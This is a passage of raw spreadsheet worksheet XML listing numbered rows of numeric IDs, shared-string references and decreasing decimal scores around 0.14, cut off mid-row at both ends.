        <v>0.1467661691542289</v>
      </c>
    </row>
    <row r="11383" ht="15.75" customHeight="1">
      <c r="A11383" s="1">
        <v>2877.0</v>
      </c>
      <c r="B11383" s="2">
        <v>3.5648087E7</v>
      </c>
      <c r="C11383" s="2" t="s">
        <v>10915</v>
      </c>
      <c r="D11383" s="2">
        <v>1.0</v>
      </c>
      <c r="E11383" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11383" s="2">
        <v>0.1467013888888889</v>
      </c>
    </row>
    <row r="11384" ht="15.75" customHeight="1">
      <c r="A11384" s="1">
        <v>8700.0</v>
      </c>
      <c r="B11384" s="2">
        <v>5.4433702E7</v>
      </c>
      <c r="C11384" s="2" t="s">
        <v>10916</v>
      </c>
      <c r="D11384" s="2">
        <v>1.0</v>
      </c>
      <c r="E11384" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11384" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="11385" ht="15.75" customHeight="1">
      <c r="A11385" s="1">
        <v>13705.0</v>
      </c>
      <c r="B11385" s="2">
        <v>3.6184582E7</v>
      </c>
      <c r="C11385" s="2" t="s">
        <v>10917</v>
      </c>
      <c r="D11385" s="2">
        <v>1.0</v>
      </c>
      <c r="E11385" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11385" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="11386" ht="15.75" customHeight="1">
      <c r="A11386" s="1">
        <v>11044.0</v>
      </c>
      <c r="B11386" s="2">
        <v>1.8109797E7</v>
      </c>
      <c r="C11386" s="2" t="s">
        <v>10918</v>
      </c>
      <c r="D11386" s="2">
        <v>1.0</v>
      </c>
      <c r="E11386" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11386" s="2">
        <v>0.1466302367941712</v>
      </c>
    </row>
    <row r="11387" ht="15.75" customHeight="1">
      <c r="A11387" s="1">
        <v>5674.0</v>
      </c>
      <c r="B11387" s="2">
        <v>4.634607E7</v>
      </c>
      <c r="C11387" s="2" t="s">
        <v>10919</v>
      </c>
      <c r="D11387" s="2">
        <v>1.0</v>
      </c>
      <c r="E11387" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11387" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="11388" ht="15.75" customHeight="1">
      <c r="A11388" s="1">
        <v>22910.0</v>
      </c>
      <c r="B11388" s="2">
        <v>4.8227408E7</v>
      </c>
      <c r="C11388" s="2" t="s">
        <v>10920</v>
      </c>
      <c r="D11388" s="2">
        <v>1.0</v>
      </c>
      <c r="E11388" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11388" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="11389" ht="15.75" customHeight="1">
      <c r="A11389" s="1">
        <v>1180.0</v>
      </c>
      <c r="B11389" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C11389" s="2" t="s">
        <v>10921</v>
      </c>
      <c r="D11389" s="2">
        <v>1.0</v>
      </c>
      <c r="E11389" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11389" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="11390" ht="15.75" customHeight="1">
      <c r="A11390" s="1">
        <v>18726.0</v>
      </c>
      <c r="B11390" s="2">
        <v>5.3693864E7</v>
      </c>
      <c r="C11390" s="2" t="s">
        <v>10922</v>
      </c>
      <c r="D11390" s="2">
        <v>1.0</v>
      </c>
      <c r="E11390" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11390" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="11391" ht="15.75" customHeight="1">
      <c r="A11391" s="1">
        <v>517.0</v>
      </c>
      <c r="B11391" s="2">
        <v>1.8197418E7</v>
      </c>
      <c r="C11391" s="2" t="s">
        <v>10923</v>
      </c>
      <c r="D11391" s="2">
        <v>1.0</v>
      </c>
      <c r="E11391" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11391" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="11392" ht="15.75" customHeight="1">
      <c r="A11392" s="1">
        <v>3472.0</v>
      </c>
      <c r="B11392" s="2">
        <v>3.8350464E7</v>
      </c>
      <c r="C11392" s="2" t="s">
        <v>10924</v>
      </c>
      <c r="D11392" s="2">
        <v>1.0</v>
      </c>
      <c r="E11392" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11392" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="11393" ht="15.75" customHeight="1">
      <c r="A11393" s="1">
        <v>9931.0</v>
      </c>
      <c r="B11393" s="2">
        <v>5.6830851E7</v>
      </c>
      <c r="C11393" s="2" t="s">
        <v>10925</v>
      </c>
      <c r="D11393" s="2">
        <v>1.0</v>
      </c>
      <c r="E11393" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11393" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="11394" ht="15.75" customHeight="1">
      <c r="A11394" s="1">
        <v>5213.0</v>
      </c>
      <c r="B11394" s="2">
        <v>4.4939523E7</v>
      </c>
      <c r="C11394" s="2" t="s">
        <v>10926</v>
      </c>
      <c r="D11394" s="2">
        <v>1.0</v>
      </c>
      <c r="E11394" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11394" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11395" ht="15.75" customHeight="1">
      <c r="A11395" s="1">
        <v>7487.0</v>
      </c>
      <c r="B11395" s="2">
        <v>5.1366711E7</v>
      </c>
      <c r="C11395" s="2" t="s">
        <v>10927</v>
      </c>
      <c r="D11395" s="2">
        <v>1.0</v>
      </c>
      <c r="E11395" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11395" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11396" ht="15.75" customHeight="1">
      <c r="A11396" s="1">
        <v>9384.0</v>
      </c>
      <c r="B11396" s="2">
        <v>5.5743263E7</v>
      </c>
      <c r="C11396" s="2" t="s">
        <v>10928</v>
      </c>
      <c r="D11396" s="2">
        <v>1.0</v>
      </c>
      <c r="E11396" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11396" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11397" ht="15.75" customHeight="1">
      <c r="A11397" s="1">
        <v>11754.0</v>
      </c>
      <c r="B11397" s="2">
        <v>2.412659E7</v>
      </c>
      <c r="C11397" s="2" t="s">
        <v>10929</v>
      </c>
      <c r="D11397" s="2">
        <v>1.0</v>
      </c>
      <c r="E11397" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11397" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11398" ht="15.75" customHeight="1">
      <c r="A11398" s="1">
        <v>14183.0</v>
      </c>
      <c r="B11398" s="2">
        <v>3.8125269E7</v>
      </c>
      <c r="C11398" s="2" t="s">
        <v>10930</v>
      </c>
      <c r="D11398" s="2">
        <v>1.0</v>
      </c>
      <c r="E11398" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11398" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11399" ht="15.75" customHeight="1">
      <c r="A11399" s="1">
        <v>15352.0</v>
      </c>
      <c r="B11399" s="2">
        <v>4.2659256E7</v>
      </c>
      <c r="C11399" s="2" t="s">
        <v>10931</v>
      </c>
      <c r="D11399" s="2">
        <v>1.0</v>
      </c>
      <c r="E11399" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11399" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11400" ht="15.75" customHeight="1">
      <c r="A11400" s="1">
        <v>17689.0</v>
      </c>
      <c r="B11400" s="2">
        <v>5.0505056E7</v>
      </c>
      <c r="C11400" s="2" t="s">
        <v>10932</v>
      </c>
      <c r="D11400" s="2">
        <v>1.0</v>
      </c>
      <c r="E11400" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11400" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11401" ht="15.75" customHeight="1">
      <c r="A11401" s="1">
        <v>18613.0</v>
      </c>
      <c r="B11401" s="2">
        <v>5.3336984E7</v>
      </c>
      <c r="C11401" s="2" t="s">
        <v>10933</v>
      </c>
      <c r="D11401" s="2">
        <v>1.0</v>
      </c>
      <c r="E11401" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11401" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11402" ht="15.75" customHeight="1">
      <c r="A11402" s="1">
        <v>18689.0</v>
      </c>
      <c r="B11402" s="2">
        <v>5.3599385E7</v>
      </c>
      <c r="C11402" s="2" t="s">
        <v>10934</v>
      </c>
      <c r="D11402" s="2">
        <v>1.0</v>
      </c>
      <c r="E11402" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11402" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11403" ht="15.75" customHeight="1">
      <c r="A11403" s="1">
        <v>19211.0</v>
      </c>
      <c r="B11403" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C11403" s="2" t="s">
        <v>10935</v>
      </c>
      <c r="D11403" s="2">
        <v>1.0</v>
      </c>
      <c r="E11403" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11403" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11404" ht="15.75" customHeight="1">
      <c r="A11404" s="1">
        <v>22900.0</v>
      </c>
      <c r="B11404" s="2">
        <v>4.7989202E7</v>
      </c>
      <c r="C11404" s="2" t="s">
        <v>10936</v>
      </c>
      <c r="D11404" s="2">
        <v>1.0</v>
      </c>
      <c r="E11404" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11404" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11405" ht="15.75" customHeight="1">
      <c r="A11405" s="1">
        <v>28451.0</v>
      </c>
      <c r="B11405" s="2">
        <v>2.6593589E7</v>
      </c>
      <c r="C11405" s="2" t="s">
        <v>10937</v>
      </c>
      <c r="D11405" s="2">
        <v>1.0</v>
      </c>
      <c r="E11405" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11405" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11406" ht="15.75" customHeight="1">
      <c r="A11406" s="1">
        <v>29841.0</v>
      </c>
      <c r="B11406" s="2">
        <v>3.5566805E7</v>
      </c>
      <c r="C11406" s="2" t="s">
        <v>10938</v>
      </c>
      <c r="D11406" s="2">
        <v>1.0</v>
      </c>
      <c r="E11406" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11406" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="11407" ht="15.75" customHeight="1">
      <c r="A11407" s="1">
        <v>6877.0</v>
      </c>
      <c r="B11407" s="2">
        <v>4.9719566E7</v>
      </c>
      <c r="C11407" s="2" t="s">
        <v>10939</v>
      </c>
      <c r="D11407" s="2">
        <v>1.0</v>
      </c>
      <c r="E11407" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11407" s="2">
        <v>0.1457326892109501</v>
      </c>
    </row>
    <row r="11408" ht="15.75" customHeight="1">
      <c r="A11408" s="1">
        <v>7616.0</v>
      </c>
      <c r="B11408" s="2">
        <v>5.1711853E7</v>
      </c>
      <c r="C11408" s="2" t="s">
        <v>10940</v>
      </c>
      <c r="D11408" s="2">
        <v>1.0</v>
      </c>
      <c r="E11408" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11408" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="11409" ht="15.75" customHeight="1">
      <c r="A11409" s="1">
        <v>8151.0</v>
      </c>
      <c r="B11409" s="2">
        <v>5.3172263E7</v>
      </c>
      <c r="C11409" s="2" t="s">
        <v>10941</v>
      </c>
      <c r="D11409" s="2">
        <v>1.0</v>
      </c>
      <c r="E11409" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11409" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="11410" ht="15.75" customHeight="1">
      <c r="A11410" s="1">
        <v>15591.0</v>
      </c>
      <c r="B11410" s="2">
        <v>4.3455002E7</v>
      </c>
      <c r="C11410" s="2" t="s">
        <v>10942</v>
      </c>
      <c r="D11410" s="2">
        <v>1.0</v>
      </c>
      <c r="E11410" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11410" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="11411" ht="15.75" customHeight="1">
      <c r="A11411" s="1">
        <v>19591.0</v>
      </c>
      <c r="B11411" s="2">
        <v>5.6161343E7</v>
      </c>
      <c r="C11411" s="2" t="s">
        <v>10943</v>
      </c>
      <c r="D11411" s="2">
        <v>1.0</v>
      </c>
      <c r="E11411" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11411" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="11412" ht="15.75" customHeight="1">
      <c r="A11412" s="1">
        <v>33377.0</v>
      </c>
      <c r="B11412" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C11412" s="2" t="s">
        <v>10944</v>
      </c>
      <c r="D11412" s="2">
        <v>1.0</v>
      </c>
      <c r="E11412" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11412" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="11413" ht="15.75" customHeight="1">
      <c r="A11413" s="1">
        <v>10167.0</v>
      </c>
      <c r="B11413" s="2">
        <v>5.7353222E7</v>
      </c>
      <c r="C11413" s="2" t="s">
        <v>10945</v>
      </c>
      <c r="D11413" s="2">
        <v>1.0</v>
      </c>
      <c r="E11413" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11413" s="2">
        <v>0.1450617283950618</v>
      </c>
    </row>
    <row r="11414" ht="15.75" customHeight="1">
      <c r="A11414" s="1">
        <v>16043.0</v>
      </c>
      <c r="B11414" s="2">
        <v>4.5157323E7</v>
      </c>
      <c r="C11414" s="2" t="s">
        <v>10946</v>
      </c>
      <c r="D11414" s="2">
        <v>1.0</v>
      </c>
      <c r="E11414" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11414" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="11415" ht="15.75" customHeight="1">
      <c r="A11415" s="1">
        <v>32144.0</v>
      </c>
      <c r="B11415" s="2">
        <v>5.4227889E7</v>
      </c>
      <c r="C11415" s="2" t="s">
        <v>10947</v>
      </c>
      <c r="D11415" s="2">
        <v>1.0</v>
      </c>
      <c r="E11415" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11415" s="2">
        <v>0.1448087431693989</v>
      </c>
    </row>
    <row r="11416" ht="15.75" customHeight="1">
      <c r="A11416" s="1">
        <v>19136.0</v>
      </c>
      <c r="B11416" s="2">
        <v>5.4796994E7</v>
      </c>
      <c r="C11416" s="2" t="s">
        <v>10948</v>
      </c>
      <c r="D11416" s="2">
        <v>1.0</v>
      </c>
      <c r="E11416" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11416" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="11417" ht="15.75" customHeight="1">
      <c r="A11417" s="1">
        <v>25926.0</v>
      </c>
      <c r="B11417" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C11417" s="2" t="s">
        <v>10949</v>
      </c>
      <c r="D11417" s="2">
        <v>1.0</v>
      </c>
      <c r="E11417" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11417" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="11418" ht="15.75" customHeight="1">
      <c r="A11418" s="1">
        <v>27918.0</v>
      </c>
      <c r="B11418" s="2">
        <v>2.3731786E7</v>
      </c>
      <c r="C11418" s="2" t="s">
        <v>10950</v>
      </c>
      <c r="D11418" s="2">
        <v>1.0</v>
      </c>
      <c r="E11418" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11418" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="11419" ht="15.75" customHeight="1">
      <c r="A11419" s="1">
        <v>6303.0</v>
      </c>
      <c r="B11419" s="2">
        <v>4.8231366E7</v>
      </c>
      <c r="C11419" s="2" t="s">
        <v>10951</v>
      </c>
      <c r="D11419" s="2">
        <v>1.0</v>
      </c>
      <c r="E11419" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11419" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="11420" ht="15.75" customHeight="1">
      <c r="A11420" s="1">
        <v>8268.0</v>
      </c>
      <c r="B11420" s="2">
        <v>5.3430294E7</v>
      </c>
      <c r="C11420" s="2" t="s">
        <v>10952</v>
      </c>
      <c r="D11420" s="2">
        <v>1.0</v>
      </c>
      <c r="E11420" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11420" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="11421" ht="15.75" customHeight="1">
      <c r="A11421" s="1">
        <v>9460.0</v>
      </c>
      <c r="B11421" s="2">
        <v>5.5847788E7</v>
      </c>
      <c r="C11421" s="2" t="s">
        <v>10953</v>
      </c>
      <c r="D11421" s="2">
        <v>1.0</v>
      </c>
      <c r="E11421" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11421" s="2">
        <v>0.1444444444444444</v>
      </c>
    </row>
    <row r="11422" ht="15.75" customHeight="1">
      <c r="A11422" s="1">
        <v>7433.0</v>
      </c>
      <c r="B11422" s="2">
        <v>5.1184006E7</v>
      </c>
      <c r="C11422" s="2" t="s">
        <v>10954</v>
      </c>
      <c r="D11422" s="2">
        <v>1.0</v>
      </c>
      <c r="E11422" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11422" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="11423" ht="15.75" customHeight="1">
      <c r="A11423" s="1">
        <v>3163.0</v>
      </c>
      <c r="B11423" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C11423" s="5" t="s">
        <v>10955</v>
      </c>
      <c r="D11423" s="2">
        <v>1.0</v>
      </c>
      <c r="E11423" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11423" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="11424" ht="15.75" customHeight="1">
      <c r="A11424" s="1">
        <v>3734.0</v>
      </c>
      <c r="B11424" s="2">
        <v>3.9657071E7</v>
      </c>
      <c r="C11424" s="2" t="s">
        <v>10956</v>
      </c>
      <c r="D11424" s="2">
        <v>1.0</v>
      </c>
      <c r="E11424" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11424" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="11425" ht="15.75" customHeight="1">
      <c r="A11425" s="1">
        <v>8943.0</v>
      </c>
      <c r="B11425" s="2">
        <v>5.489404E7</v>
      </c>
      <c r="C11425" s="2" t="s">
        <v>10957</v>
      </c>
      <c r="D11425" s="2">
        <v>1.0</v>
      </c>
      <c r="E11425" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11425" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="11426" ht="15.75" customHeight="1">
      <c r="A11426" s="1">
        <v>18384.0</v>
      </c>
      <c r="B11426" s="2">
        <v>5.2583656E7</v>
      </c>
      <c r="C11426" s="2" t="s">
        <v>10958</v>
      </c>
      <c r="D11426" s="2">
        <v>1.0</v>
      </c>
      <c r="E11426" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11426" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="11427" ht="15.75" customHeight="1">
      <c r="A11427" s="1">
        <v>14785.0</v>
      </c>
      <c r="B11427" s="2">
        <v>4.0912031E7</v>
      </c>
      <c r="C11427" s="2" t="s">
        <v>10959</v>
      </c>
      <c r="D11427" s="2">
        <v>1.0</v>
      </c>
      <c r="E11427" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11427" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="11428" ht="15.75" customHeight="1">
      <c r="A11428" s="1">
        <v>15689.0</v>
      </c>
      <c r="B11428" s="2">
        <v>4.3883697E7</v>
      </c>
      <c r="C11428" s="2" t="s">
        <v>10960</v>
      </c>
      <c r="D11428" s="2">
        <v>1.0</v>
      </c>
      <c r="E11428" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11428" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="11429" ht="15.75" customHeight="1">
      <c r="A11429" s="1">
        <v>17568.0</v>
      </c>
      <c r="B11429" s="2">
        <v>5.0255844E7</v>
      </c>
      <c r="C11429" s="2" t="s">
        <v>10961</v>
      </c>
      <c r="D11429" s="2">
        <v>1.0</v>
      </c>
      <c r="E11429" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11429" s="2">
        <v>0.1434494195688226</v>
      </c>
    </row>
    <row r="11430" ht="15.75" customHeight="1">
      <c r="A11430" s="1">
        <v>2918.0</v>
      </c>
      <c r="B11430" s="2">
        <v>3.583437E7</v>
      </c>
      <c r="C11430" s="2" t="s">
        <v>10962</v>
      </c>
      <c r="D11430" s="2">
        <v>1.0</v>
      </c>
      <c r="E11430" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11430" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11431" ht="15.75" customHeight="1">
      <c r="A11431" s="1">
        <v>6937.0</v>
      </c>
      <c r="B11431" s="2">
        <v>4.9907529E7</v>
      </c>
      <c r="C11431" s="2" t="s">
        <v>10963</v>
      </c>
      <c r="D11431" s="2">
        <v>1.0</v>
      </c>
      <c r="E11431" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11431" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11432" ht="15.75" customHeight="1">
      <c r="A11432" s="1">
        <v>10047.0</v>
      </c>
      <c r="B11432" s="2">
        <v>5.7106683E7</v>
      </c>
      <c r="C11432" s="2" t="s">
        <v>10964</v>
      </c>
      <c r="D11432" s="2">
        <v>1.0</v>
      </c>
      <c r="E11432" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11432" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11433" ht="15.75" customHeight="1">
      <c r="A11433" s="1">
        <v>10873.0</v>
      </c>
      <c r="B11433" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C11433" s="2" t="s">
        <v>10965</v>
      </c>
      <c r="D11433" s="2">
        <v>1.0</v>
      </c>
      <c r="E11433" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11433" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11434" ht="15.75" customHeight="1">
      <c r="A11434" s="1">
        <v>11392.0</v>
      </c>
      <c r="B11434" s="2">
        <v>2.1535916E7</v>
      </c>
      <c r="C11434" s="2" t="s">
        <v>10966</v>
      </c>
      <c r="D11434" s="2">
        <v>1.0</v>
      </c>
      <c r="E11434" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11434" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11435" ht="15.75" customHeight="1">
      <c r="A11435" s="1">
        <v>12566.0</v>
      </c>
      <c r="B11435" s="2">
        <v>2.9939308E7</v>
      </c>
      <c r="C11435" s="2" t="s">
        <v>10967</v>
      </c>
      <c r="D11435" s="2">
        <v>1.0</v>
      </c>
      <c r="E11435" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11435" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11436" ht="15.75" customHeight="1">
      <c r="A11436" s="1">
        <v>16961.0</v>
      </c>
      <c r="B11436" s="2">
        <v>4.8257385E7</v>
      </c>
      <c r="C11436" s="2" t="s">
        <v>10968</v>
      </c>
      <c r="D11436" s="2">
        <v>1.0</v>
      </c>
      <c r="E11436" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11436" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11437" ht="15.75" customHeight="1">
      <c r="A11437" s="1">
        <v>18079.0</v>
      </c>
      <c r="B11437" s="2">
        <v>5.1627925E7</v>
      </c>
      <c r="C11437" s="2" t="s">
        <v>10969</v>
      </c>
      <c r="D11437" s="2">
        <v>1.0</v>
      </c>
      <c r="E11437" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11437" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11438" ht="15.75" customHeight="1">
      <c r="A11438" s="1">
        <v>30406.0</v>
      </c>
      <c r="B11438" s="2">
        <v>3.8762313E7</v>
      </c>
      <c r="C11438" s="2" t="s">
        <v>10970</v>
      </c>
      <c r="D11438" s="2">
        <v>1.0</v>
      </c>
      <c r="E11438" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11438" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="11439" ht="15.75" customHeight="1">
      <c r="A11439" s="1">
        <v>2232.0</v>
      </c>
      <c r="B11439" s="2">
        <v>3.2271494E7</v>
      </c>
      <c r="C11439" s="2" t="s">
        <v>10971</v>
      </c>
      <c r="D11439" s="2">
        <v>1.0</v>
      </c>
      <c r="E11439" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11439" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11440" ht="15.75" customHeight="1">
      <c r="A11440" s="1">
        <v>3855.0</v>
      </c>
      <c r="B11440" s="2">
        <v>4.0301345E7</v>
      </c>
      <c r="C11440" s="2" t="s">
        <v>10972</v>
      </c>
      <c r="D11440" s="2">
        <v>1.0</v>
      </c>
      <c r="E11440" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11440" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11441" ht="15.75" customHeight="1">
      <c r="A11441" s="1">
        <v>7369.0</v>
      </c>
      <c r="B11441" s="2">
        <v>5.1040229E7</v>
      </c>
      <c r="C11441" s="2" t="s">
        <v>10973</v>
      </c>
      <c r="D11441" s="2">
        <v>1.0</v>
      </c>
      <c r="E11441" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11441" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11442" ht="15.75" customHeight="1">
      <c r="A11442" s="1">
        <v>9412.0</v>
      </c>
      <c r="B11442" s="2">
        <v>5.5780907E7</v>
      </c>
      <c r="C11442" s="2" t="s">
        <v>10974</v>
      </c>
      <c r="D11442" s="2">
        <v>1.0</v>
      </c>
      <c r="E11442" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11442" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11443" ht="15.75" customHeight="1">
      <c r="A11443" s="1">
        <v>9747.0</v>
      </c>
      <c r="B11443" s="2">
        <v>5.6474892E7</v>
      </c>
      <c r="C11443" s="2" t="s">
        <v>10975</v>
      </c>
      <c r="D11443" s="2">
        <v>1.0</v>
      </c>
      <c r="E11443" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11443" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11444" ht="15.75" customHeight="1">
      <c r="A11444" s="1">
        <v>15346.0</v>
      </c>
      <c r="B11444" s="2">
        <v>4.2621712E7</v>
      </c>
      <c r="C11444" s="2" t="s">
        <v>10976</v>
      </c>
      <c r="D11444" s="2">
        <v>1.0</v>
      </c>
      <c r="E11444" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11444" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11445" ht="15.75" customHeight="1">
      <c r="A11445" s="1">
        <v>17048.0</v>
      </c>
      <c r="B11445" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C11445" s="2" t="s">
        <v>10977</v>
      </c>
      <c r="D11445" s="2">
        <v>1.0</v>
      </c>
      <c r="E11445" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11445" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11446" ht="15.75" customHeight="1">
      <c r="A11446" s="1">
        <v>17665.0</v>
      </c>
      <c r="B11446" s="2">
        <v>5.0445057E7</v>
      </c>
      <c r="C11446" s="2" t="s">
        <v>10978</v>
      </c>
      <c r="D11446" s="2">
        <v>1.0</v>
      </c>
      <c r="E11446" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11446" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11447" ht="15.75" customHeight="1">
      <c r="A11447" s="1">
        <v>18614.0</v>
      </c>
      <c r="B11447" s="2">
        <v>5.3336984E7</v>
      </c>
      <c r="C11447" s="2" t="s">
        <v>10979</v>
      </c>
      <c r="D11447" s="2">
        <v>1.0</v>
      </c>
      <c r="E11447" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11447" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11448" ht="15.75" customHeight="1">
      <c r="A11448" s="1">
        <v>18894.0</v>
      </c>
      <c r="B11448" s="2">
        <v>5.4133794E7</v>
      </c>
      <c r="C11448" s="2" t="s">
        <v>10980</v>
      </c>
      <c r="D11448" s="2">
        <v>1.0</v>
      </c>
      <c r="E11448" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11448" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="11449" ht="15.75" customHeight="1">
      <c r="A11449" s="1">
        <v>28733.0</v>
      </c>
      <c r="B11449" s="2">
        <v>2.7984406E7</v>
      </c>
      <c r="C11449" s="5" t="s">
        <v>10981</v>
      </c>
      <c r="D11449" s="2">
        <v>1.0</v>
      </c>
      <c r="E11449" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11449" s="2">
